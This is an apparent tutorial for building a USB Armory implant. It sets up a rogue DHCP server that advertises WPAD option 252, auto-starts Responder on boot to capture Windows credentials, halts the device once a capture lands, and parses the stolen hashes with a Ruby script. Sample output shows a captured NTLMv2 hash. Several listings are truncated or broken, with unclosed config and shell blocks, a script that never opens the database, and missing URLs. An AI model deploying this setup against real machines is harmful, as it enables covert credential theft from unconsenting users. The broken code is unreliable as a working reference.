USB Armory How to tutorial

Installing Image

wget -c wget -c
fdisk -l

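Burn the image onto the microSD card. Check the `fdisk -l` output first and replace /dev/sdc below with the card's device name, since dd overwrites whatever device it is given.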

dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync 

Setting up repositories

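# APT reads its repository list from /etc/apt/sources.list (plural "sources");
# editing a file named source.list would leave the active repositories unchanged.
nano /etc/apt/sources.list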

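Remove all current repos and add the following. Note that `stable` follows whichever Debian release is current, so on this Jessie image it may pull packages from a newer release than the `jessie-backports` lines expect; use the release codename instead if you want to stay on Jessie.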

###### Debian Main Repos
deb stable main contrib non-free
deb-src stable main contrib non-free

deb stable-updates main contrib non-free
deb-src stable-updates main contrib non-free

deb stable/updates main
deb-src stable/updates main

deb jessie-backports main
deb-src jessie-backports main

now update your repository

apt update
apt upgrade 

Enable internet access for the USB Armory

On your linux machine

# Inserts an unconditional ACCEPT at the top of the FORWARD chain: any packet
# the host forwards is accepted, not only traffic from the USB Armory link.
# Narrow it with -i/-o to the USB interface where possible, and delete both
# rules (iptables -D ...) once the device no longer needs internet access.
iptables -I FORWARD -j ACCEPT
# Masquerades (source-NATs) everything leaving through wls1.
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE 

Here wls1 is the host's internet-facing interface; substitute your own interface name.

Bash autocompletion

apt install bash-completion
nano /etc/bash.bashrc

search for (ctrl+w)

# enable bash completion in interactive shells

Then uncomment the following lines (commented by default)

if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion

apply the changes

source /etc/bash.bashrc

Installing basic applications

System applications and libraries

apt-get install -y curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev


apt-get install -y ruby ruby-dev 
gem install pry


# Python interpreter, pip and headers from the distribution packages.
apt-get install -y python python-pip python-dev 
# NOTE(review): pycrypto is no longer maintained; pycryptodome is the
# maintained drop-in that provides the same Crypto package — confirm the
# tools used later work with it. The install is also unpinned and runs as
# root, so whatever version the index serves at install time is what runs.
pip install pycrypto

Attack Setup

Enable IP forwarding

  • Enable kernel ip forwarding
nano /etc/sysctl.conf

uncomment the following line

  • Enable firewall masquerading
iptables -t nat -I POSTROUTING -o usb0 -j MASQUERADE 

DHCPd setup

# Sample configuration file for ISC dhcpd for Debian
# NOTE(review): as shown here the listing is incomplete — the name-server,
# router and subnet/netmask values are missing and the subnet block is never
# closed — so it is not a usable configuration as-is.

# have support for DDNS.
# Dynamic DNS updates are turned off.
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "";
option domain-name-servers;

# Global lease times, in seconds; the subnet block below overrides them.
default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad
# Declares DHCP option 252 as a text option. This is the option that clients
# with automatic proxy detection (WPAD) read to locate a proxy auto-config
# file, so such clients trust whichever DHCP server answers them. Turning off
# automatic proxy detection on managed clients removes that dependency.
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet netmask {
  # Per-subnet lease times (60 s / 72 s) replace the global values above.
  default-lease-time 60;
  max-lease-time 72;
  option routers;
  # Value handed out for option 252; empty in this listing.
  option local-proxy-config "";

Responder setup

Download responder

mkdir /pentest
cd /pentest
git clone
chmod +x

Make startups

#!/bin/sh -e
# rc.local
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
# In order to enable or disable this script just change the execution
# bits.
# By default this script does nothing.
# NOTE(review): this listing is incomplete as shown — the `then`, `done` and
# `fi` lines (and apparently the command that starts dhcpd) are missing — so
# it is not runnable verbatim.

# Generate ssh host keys if missing
# Counts the /etc/ssh/ssh_host_* files; ls errors are discarded, so a
# directory without host keys yields 0.
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
  # Poll once a second until the kernel reports at least 256 bits of available
  # entropy, so host keys are not generated from a starved pool.
  while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
    sleep 1;
  # Reconfigures openssh-server; per the heading above, this is what creates
  # the missing host keys.
  /usr/sbin/dpkg-reconfigure openssh-server

# Start DHCP server
# Only acts when no process named exactly "dhcpd" is running (pgrep -x).
if ! pgrep -x "dhcpd" > /dev/null
    echo "Staring DHCPd" >> /root/rc.log
    # Overwrites the lease database with a single empty line, discarding any
    # earlier leases.
    echo '' > /var/lib/dhcp/dhcpd.leases

# Start Responder
echo "Staring Responder" >> /root/rc.log
# Detached screen session named "responder"; the command runs from
# /pentest/responder/.
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python -I usb0 -f -w -r -d -F'

echo "Staring cred watch" >> /root/rc.log
# Detached screen session named "notify": when inotifywait reports a modify
# event on Responder.db, the device is halted (shutdown -h now).
# NOTE(review): on the host side this would presumably look like a USB network
# interface that disappears shortly after it was enumerated — a signal worth
# correlating in endpoint logs; confirm against real telemetry.
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'

exit 0

Post attack

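To get all stolen credentials from Responder, go to /pentest/responder/Responder.db or use the following script to parse its contents. The database holds password hashes and any cleartext passwords, so keep it access-restricted and remove it from the device once the results have been reported.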

Install sqlite3 gem

gem install sqlite3

run the following script

#!/usr/bin/env ruby 
# Responder database reader 
# Prints every row of the `responder` table of a Responder SQLite database.
# NOTE(review): this listing is incomplete as shown — the else/end of the
# argument check and the end of the each block are missing, and `db` below is
# assigned the path string, which has no execute method; the call that opens
# the database appears to have been lost.
# The output includes captured hashes and any cleartext values, so treat it
# as sensitive engagement data.
require "sqlite3"

# Exactly one argument is expected: the path to Responder.db.
if ARGV.size == 1 
  responder_db = ARGV[0]
  puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"

# Open
db = responder_db
# Fetches all rows and columns of the responder table.
records = db.execute "SELECT * FROM responder;"
puts "[+] Number of recrods: #{records.size}"
sleep 1

# Columns are read by position (index 4 is not printed). Column 5 is split on
# a backslash: the part before it is printed as Hostname, the part after it
# as Username.
records.each do |record|
 puts "Timestamp:  #{record[0]}"
 puts "Module:     #{record[1]}"
 puts "HashType:   #{record[2]}"
 puts "IPaddress:  #{record[3]}"
 puts "Hostname:   #{record[5].split('\\')[0]}"
 puts "Username:   #{record[5].split('\\')[1]}"
 puts "Cleartext:  #{record[6]}"
 puts "Hash:       #{record[7]}"
 puts "Full Hash:  #{record[8]}"
ruby responder-reader.rb /pentest/responder/Responder.db


[+] Number of recrods: 1
Timestamp:  2017-06-21 06:23:10
Module:     HTTP
HashType:   NTLMv2
Hostname:   DESKTOP-9INJ6LJ
Username:   KING
Hash:       8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash:  KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
